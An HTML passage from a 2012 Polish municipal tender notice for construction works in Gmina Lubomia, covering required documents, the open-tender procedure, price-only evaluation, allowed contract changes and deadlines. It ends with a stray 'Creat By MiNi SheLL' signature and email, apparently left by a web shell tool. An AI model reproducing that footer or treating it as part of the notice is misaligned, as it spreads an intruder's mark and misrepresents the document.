<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest załączyć do swojej oferty  kosztorys ofertowy- sporządzony na  podstawie przedmiaru robót stanowiącego załącznik do SIWZ. Do kompletu kosztorysów ofertowych, sporządzonych w cenach netto, należy dołączyć zestawienie kosztorysów, zawierające ich wartości netto, jeśli tych kosztorysów jest więcej. 
 Zaparafowany na dowód akceptacji przez osobę (osoby) upoważnioną (upoważnione) do reprezentacji Wykonawcy wzór umowy stanowiący załącznik specyfikacji istotnych warunków zamówienia.
 Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany do Umowy możliwe są jedynie w trybie art. 144 ustawy. Zmiana Umowy może nastąpić jedynie na piśmie pod rygorem nieważności. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty oraz określa  następujące warunki takiej zmiany poprzez zmianę odpowiednio sposobu realizacji robót, okresu i terminów ich realizacji i/lub ceny :
- zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Robót;
- zmiany stawki urzędowej podatku VAT, przy czym w takim przypadku zmianie ulegnie stawka podatku VAT, kwota podatku VAT i kwota ceny brutto;
- rezygnacji z części robót, jeżeli taka rezygnacja będzie niezbędna dla prawidłowej realizacji Umowy;
- obiektywnie uzasadnionej decyzji Zamawiającego co do kolejności realizacji Robót;
- wystąpienia konieczności wprowadzenia zmiany osób personelu Wykonawcy z przyczyn niezależnych od Wykonawcy;
- zawieszenia robót lub zmiany w przewidywanych terminach ich wykonywania;
-uzasadnionych, niezawinionych przez Wykonawcę przerw w realizacji Umowy spowodowanych siłą wyższą; 
- wystąpienia w trakcie realizacji Umowy konieczności wykonania robót zamiennych;
- zmiany osób upoważnionych do kontaktów w związku z realizacją Umowy;
- zmiany rachunku bankowego i innych danych zarówno Wykonawcy, jak i Zamawiającego;
- zmiany technologii wykonania Robót, lub zmiany materiałów i/lub urządzeń, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych;
- istotnych okoliczności mających wpływ na realizację robót, których nie można było przewidzieć w chwili zawarcia Umowy
- odmienne od przyjętych w dokumentacji warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubomia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubomia
ul. Szkolna 1
44-360 Lubomia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2012 godzina 09:30, miejsce: Urząd Gminy Lubomia
ul. Szkolna 1
44-360 Lubomia
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com